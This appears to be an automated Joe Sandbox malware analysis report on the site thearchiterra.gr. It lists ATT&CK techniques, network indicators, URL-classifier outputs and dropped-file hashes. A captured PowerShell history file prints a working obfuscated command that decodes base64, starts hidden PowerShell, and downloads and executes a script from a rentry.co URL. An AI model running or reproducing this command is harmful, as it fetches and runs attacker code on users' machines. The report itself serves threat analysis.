      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting
      Valid Accounts1
      Command and Scripting Interpreter
      2
      Browser Extensions
      11
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote Services1
      Clipboard Data
      1
      Web Service
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell
      1
      Scripting
      1
      Registry Run Keys / Startup Folder
      21
      Virtualization/Sandbox Evasion
      LSASS Memory21
      Virtualization/Sandbox Evasion
      Remote Desktop ProtocolData from Removable Media2
      Encrypted Channel
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      Registry Run Keys / Startup Folder
      1
      DLL Side-Loading
      11
      Process Injection
      Security Account Manager1
      Application Window Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Ingress Tool Transfer
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCron1
      DLL Side-Loading
      Login Hook11
      Deobfuscate/Decode Files or Information
      NTDS1
      System Network Configuration Discovery
      Distributed Component Object ModelInput Capture2
      Non-Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      DLL Side-Loading
      LSA Secrets2
      File and Directory Discovery
      SSHKeylogging3
      Application Layer Protocol
      Scheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
      System Information Discovery
      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.thearchiterra.gr
      5.9.110.184
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          dareka4te.shop
          188.114.96.3
          truetrue
            unknown
            thearchiterra.gr
            5.9.110.184
            truetrue
              unknown
              cdnjs.cloudflare.com
              104.17.24.14
              truefalse
                unknown
                rentry.co
                104.26.2.16
                truetrue
                  unknown
                  www.google.com
                  142.250.185.228
                  truefalse
                    unknown
                    a1d4ba62fdc34338f.awsglobalaccelerator.com
                    52.223.34.155
                    truefalse
                      unknown
                      cdn.ethers.io
                      unknown
                      unknowntrue
                        unknown
                        bsc-dataseed1.binance.org
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://www.thearchiterra.gr/false
                            unknown
                            http://thearchiterra.gr/false
                              unknown
                              https://thearchiterra.gr/true
                                unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
                                IPDomainCountryFlagASNASN NameMalicious
                                142.250.186.35
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.17.24.14
                                cdnjs.cloudflare.comUnited States
                                13335CLOUDFLARENETUSfalse
                                142.250.186.67
                                unknownUnited States
                                15169GOOGLEUSfalse
                                142.250.185.228
                                www.google.comUnited States
                                15169GOOGLEUSfalse
                                1.1.1.1
                                unknownAustralia
                                13335CLOUDFLARENETUStrue
                                52.223.34.155
                                a1d4ba62fdc34338f.awsglobalaccelerator.comUnited States
                                8987AMAZONEXPANSIONGBfalse
                                5.9.110.184
                                www.thearchiterra.grGermany
                                24940HETZNER-ASDEtrue
                                142.250.181.234
                                unknownUnited States
                                15169GOOGLEUSfalse
                                64.233.166.84
                                unknownUnited States
                                15169GOOGLEUSfalse
                                35.71.137.105
                                unknownUnited States
                                237MERIT-AS-14USfalse
                                239.255.255.250
                                unknownReserved
                                unknownunknownfalse
                                104.26.2.16
                                rentry.coUnited States
                                13335CLOUDFLARENETUStrue
                                188.114.96.3
                                dareka4te.shopEuropean Union
                                13335CLOUDFLARENETUStrue
                                142.250.184.227
                                unknownUnited States
                                15169GOOGLEUSfalse
                                142.250.184.238
                                unknownUnited States
                                15169GOOGLEUSfalse
                                35.190.80.1
                                a.nel.cloudflare.comUnited States
                                15169GOOGLEUSfalse
                                142.250.184.206
                                unknownUnited States
                                15169GOOGLEUSfalse
                                104.17.25.14
                                unknownUnited States
                                13335CLOUDFLARENETUSfalse
                                IP
                                192.168.2.16
                                192.168.2.23
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1545984
                                Start date and time:2024-10-31 11:04:36 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                Sample URL:http://www.thearchiterra.gr/
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:21
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:1
                                Technologies:
                                • EGA enabled
                                Analysis Mode:stream
                                Analysis stop reason:Timeout
                                Detection:MAL
                                Classification:mal88.troj.evad.win@25/109@35/203
                                • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 142.250.184.227, 142.250.184.238, 64.233.166.84
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
                                • Not all processes where analyzed, report is missing behavior information
                                • VT rate limit hit for: http://www.thearchiterra.gr/
                                InputOutput
                                URL: Model: claude-3-5-sonnet-latest
                                {
                                    "typosquatting": false,
                                    "unusual_query_string": false,
                                    "suspicious_tld": false,
                                    "ip_in_url": false,
                                    "long_subdomain": false,
                                    "malicious_keywords": false,
                                    "encoded_characters": false,
                                    "redirection": false,
                                    "contains_email_address": false,
                                    "known_domain": false,
                                    "brand_spoofing_attempt": false,
                                    "third_party_hosting": false
                                }
                                URL: URL: http://www.thearchiterra.gr
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "contains_trigger_text": false,
                                  "trigger_text": "unknown",
                                  "prominent_button_name": "unknown",
                                  "text_input_field_labels": "unknown",
                                  "pdf_icon_visible": false,
                                  "has_visible_captcha": false,
                                  "has_urgent_text": false,
                                  "has_visible_qrcode": false
                                }
                                URL: Model: claude-3-5-sonnet-latest
                                {
                                    "typosquatting": false,
                                    "unusual_query_string": false,
                                    "suspicious_tld": false,
                                    "ip_in_url": false,
                                    "long_subdomain": false,
                                    "malicious_keywords": false,
                                    "encoded_characters": false,
                                    "redirection": false,
                                    "contains_email_address": false,
                                    "known_domain": false,
                                    "brand_spoofing_attempt": false,
                                    "third_party_hosting": false
                                }
                                URL: URL: https://thearchiterra.gr
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "brands": [
                                    "Architerra"
                                  ]
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "contains_trigger_text": true,
                                  "trigger_text": "VIEW MORE",
                                  "prominent_button_name": "VIEW MORE",
                                  "text_input_field_labels": "unknown",
                                  "pdf_icon_visible": false,
                                  "has_visible_captcha": false,
                                  "has_urgent_text": false,
                                  "has_visible_qrcode": false
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "contains_trigger_text": false,
                                  "trigger_text": "unknown",
                                  "prominent_button_name": "unknown",
                                  "text_input_field_labels": "unknown",
                                  "pdf_icon_visible": false,
                                  "has_visible_captcha": false,
                                  "has_urgent_text": false,
                                  "has_visible_qrcode": false
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "brands": [
                                    "Architerra"
                                  ]
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "contains_trigger_text": false,
                                  "trigger_text": "unknown",
                                  "prominent_button_name": "unknown",
                                  "text_input_field_labels": "unknown",
                                  "pdf_icon_visible": false,
                                  "has_visible_captcha": false,
                                  "has_urgent_text": false,
                                  "has_visible_qrcode": false
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "brands": [
                                    "Architerra"
                                  ]
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "brands": [
                                    "Architerra"
                                  ]
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "contains_trigger_text": false,
                                  "trigger_text": "unknown",
                                  "prominent_button_name": "unknown",
                                  "text_input_field_labels": "unknown",
                                  "pdf_icon_visible": false,
                                  "has_visible_captcha": false,
                                  "has_urgent_text": false,
                                  "has_visible_qrcode": false
                                }
                                URL: https://thearchiterra.gr/ Model: claude-3-haiku-20240307
                                ```json
                                {
                                  "brands": [
                                    "Architerra"
                                  ]
                                }
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19704
                                Entropy (8bit):5.533287111500644
                                Encrypted:false
                                SSDEEP:
                                MD5:619FC62FA1D53F9A7E7C3FB3C0BDDF06
                                SHA1:BC5346985E02D731370C2FDE7A3672EDB8133EF1
                                SHA-256:5C4D030FF0109B93E261388ED51867C3885A7FAF6EA27212F104BDACDC415A56
                                SHA-512:513E2F82A56128B74B09715EFE8092592C30D3732C90E36584BC8CAE76F451BA08907B49083341B9C6A323CAB435B1E100F7CECB7287603E2318248C299D8C7B
                                Malicious:false
                                Reputation:unknown
                                Preview:@...e...............$...........................................H...............o..b~.D.poM...8..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.H..............@-....f.J.|.7h8..q.......Microsoft.Powershell.PSReadline.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17840
                                Entropy (8bit):5.412222276818907
                                Encrypted:false
                                SSDEEP:
                                MD5:BEBEB7E6A3601E0B2508509312B9C9FB
                                SHA1:359C82FC645A866B29CB12F68F9A6E5C0B09C5E6
                                SHA-256:C192595C8611A49BB631A011C88C56BFCE653E50DBE017E2AA971A3B0B4B8F39
                                SHA-512:5CD6C05B53899AD55DF7A9C42E76AE1F19CF58D7714FF2F10FF6D64A9220B85AF2698C1CEC132657D16F78E3253CEC8F94A1D74A58B8C1FD1B3B9F06F5EFF611
                                Malicious:false
                                Reputation:unknown
                                Preview:@...e...........V....................................@..........H...............o..b~.D.poM...:..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Reputation:unknown
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with very long lines (780), with CRLF line terminators
                                Category:dropped
                                Size (bytes):988
                                Entropy (8bit):5.17946288979621
                                Encrypted:false
                                SSDEEP:
                                MD5:39C18623596447DAACB6F7A6EB30BC41
                                SHA1:0CFD06D045E3BA74331D86ABBEAD764C77BA2C17
                                SHA-256:452C4DD9748AFBEFDE8E5D4F3AC4B7AC486CF209344FFF9D5BD5050E832A18E3
                                SHA-512:728DF9D675B9EAE77F8387D0E17CE3301EA9F9BEDA83E173418B0187DAC075E475002D9B6434761192CCC4A65D7B079DBEED6A544B13215C6AEC2A4E7362B39C
                                Malicious:true
                                Yara Hits:
                                • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, Author: Joe Security
                                • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt, Author: Joe Security
                                Reputation:unknown
                                Preview:ipconfig /flushdns..$Diagnostics = "U2V0LUNsaXBib2FyZCAtVmFsdWUgIiAiOw==";..$MUI = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($Diagnostics));..Invoke-Expression $MUI;..[System.Diagnostics.Process]::Start("powershell", "-ep RemoteSigned -w 1 -enc `"JABSAEQAIAA9ACAAWwBiAG8AbwBsAF0AQAAoADAAeAAwADEAQgBFACkAOwAkAFUATwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAIgBhAEgAUgAwAGMASABNADYATAB5ADkAeQBaAFcANQAwAGMAbgBrAHUAWQAyADgAdgBaAEgAbAA2AE4AagBZADEAYwBtAEkAdgBjAG0ARgAzACIAKQApADsAJABDAE8AIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFMATwBGACAAPQAgACQAQwBPAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABVAE8AKQA7AGkAZQB4ACAAJABTAE8ARgA7ACQAbgB1AGwAbAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4AQQByAHIAYQB5AEwAaQBzAHQAXQA=`"") | Out-Null;..exit;..
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:
                                MD5:0AC3ED37B32C7B22D15EAE9F42580A65
                                SHA1:6FEA601C61F09FA31D66DFB8764D7F05AD6CB2E5
                                SHA-256:5334ABDC76FEA4CA7788716A0A29B2A375FACA1B5725E33E9B266994AB08D689
                                SHA-512:E730E754B0B4F21F61AA62B35EB162AF49740B71E37323FBFA31FAC9507BD0A3AED56055948E1FF69EFFF2E178799E90EE16B32BF679887D4480501C72109D7A
                                Malicious:false
                                Reputation:unknown
                                Preview:...................................FL..................F. .. ......{4....g.~|+..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...@w.^|+...+.~|+......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H_Y.P..............................A.p.p.D.a.t.a...B.V.1....._Y.P..Roaming.@......FW.H_Y.P..............................R.o.a.m.i.n.g.....\.1....._Y.P..MICROS~1..D......FW.H_Y.P.............................M.i.c.r.o.s.o.f.t.....V.1.....GX.w..Windows.@......FW.H_Y.P...........................By.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H_Y.P....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1....._Y.P..Programs..j......FW.H_Y.P....................@......3T.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H_Y.P..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H_Y.P....Q...........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):0
                                Entropy (8bit):0.0
                                Encrypted:false
                                SSDEEP:
                                MD5:0AC3ED37B32C7B22D15EAE9F42580A65
                                SHA1:6FEA601C61F09FA31D66DFB8764D7F05AD6CB2E5
                                SHA-256:5334ABDC76FEA4CA7788716A0A29B2A375FACA1B5725E33E9B266994AB08D689
                                SHA-512:E730E754B0B4F21F61AA62B35EB162AF49740B71E37323FBFA31FAC9507BD0A3AED56055948E1FF69EFFF2E178799E90EE16B32BF679887D4480501C72109D7A
                                Malicious:false
                                Reputation:unknown
                                Preview:...................................FL..................F. .. ......{4....g.~|+..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...@w.^|+...+.~|+......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H_Y.P..............................A.p.p.D.a.t.a...B.V.1....._Y.P..Roaming.@......FW.H_Y.P..............................R.o.a.m.i.n.g.....\.1....._Y.P..MICROS~1..D......FW.H_Y.P.............................M.i.c.r.o.s.o.f.t.....V.1.....GX.w..Windows.@......FW.H_Y.P...........................By.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H_Y.P....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1....._Y.P..Programs..j......FW.H_Y.P....................@......3T.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H_Y.P..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H_Y.P....Q...........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):5440
                                Entropy (8bit):3.936691079836026
                                Encrypted:false
                                SSDEEP:
                                MD5:0AC3ED37B32C7B22D15EAE9F42580A65
                                SHA1:6FEA601C61F09FA31D66DFB8764D7F05AD6CB2E5
                                SHA-256:5334ABDC76FEA4CA7788716A0A29B2A375FACA1B5725E33E9B266994AB08D689
                                SHA-512:E730E754B0B4F21F61AA62B35EB162AF49740B71E37323FBFA31FAC9507BD0A3AED56055948E1FF69EFFF2E178799E90EE16B32BF679887D4480501C72109D7A
                                Malicious:false
                                Reputation:unknown
                                Preview:...................................FL..................F. .. ......{4....g.~|+..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...@w.^|+...+.~|+......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H_Y.P..............................A.p.p.D.a.t.a...B.V.1....._Y.P..Roaming.@......FW.H_Y.P..............................R.o.a.m.i.n.g.....\.1....._Y.P..MICROS~1..D......FW.H_Y.P.............................M.i.c.r.o.s.o.f.t.....V.1.....GX.w..Windows.@......FW.H_Y.P...........................By.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H_Y.P....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1....._Y.P..Programs..j......FW.H_Y.P....................@......3T.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H_Y.P..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H_Y.P....Q...........
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):6220
                                Entropy (8bit):3.719288423222285
                                Encrypted:false
                                SSDEEP:
                                MD5:8F094A2CE5BDB7F1D9494E9279494FB8
                                SHA1:4E534A7D0786E26F4A3758B9E307B783192E797F
                                SHA-256:9376E4B905B1F0E2568F10B1D9C61243AA20F92959E97093281DDCA469894367
                                SHA-512:42089BFFDE4388AA1F368A674C5F62BA334B686830A589484495C966FA097A424EB532C0015075F1A13508157273C38A80AFE33A1395513B792008AAB3592BDE
                                Malicious:false
                                Reputation:unknown
                                Preview:...................................FL..................F.".. ......{4......|+..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...@w.^|+..,e..|+......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H_Y.P..............................A.p.p.D.a.t.a...B.V.1....._Y.P..Roaming.@......FW.H_Y.P..............................R.o.a.m.i.n.g.....\.1....._Y.P..MICROS~1..D......FW.H_Y.P.............................M.i.c.r.o.s.o.f.t.....V.1.....GX.w..Windows.@......FW.H_Y.P...........................By.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H_Y.P....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1....._Y.P..Programs..j......FW.H_Y.P....................@......3T.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H_Y.P..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H_Y.P....Q...........
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 31 09:05:19 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2675
                                Entropy (8bit):3.997395492657144
                                Encrypted:false
                                SSDEEP:
                                MD5:F9750C402C474D0D8B78E1A41A864AEB
                                SHA1:6ADC6F1E36422D194C5E1939981CF977B98B3AAB
                                SHA-256:EAE092C5AC1A74049FF9E6A2FF90E3A5F9D68D4FA09070158A620371ECCBA0FA
                                SHA-512:1FE2305DA4B73E92BF985A75747587B21F515DF945448C471F756D14F7EA2B5E4D8506FFCE3C1BBCD135FD85CEAB0712C0453BD3324543905E934D8BADE45454
                                Malicious:false
                                Reputation:unknown
                                Preview:L..................F.@.. ...$+.,......Kd|+..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I_Y.P....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V_Y.P....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V_Y.P....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V_Y.P..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V_Y.P...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........+..^.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                Category:dropped
                                Size (bytes):2689
                                Entropy (8bit):4.006236178006464
                                Encrypted:false
                                SSDEEP:
                                MD5:0594BE46FC4F562E1A9297C651A05DC2
                                SHA1:1E9F440119FB7185D5FCAEFE92AAA37A1506BC29
                                SHA-256:D0A350D39B0E76CE9619C3329B2595BFA0AD8EB3B4604AAB45F92AD8EB092D8A
                                SHA-512:D72542071FDB41A002D83698CCC7CEA7834659EB70045C7F9061711C1101822351E99CDFFFFB960FC69D855D6A73CA052F4742720F43A1E104BA65D46DFA235F
                                Malicious:false
                                Reputation:unknown
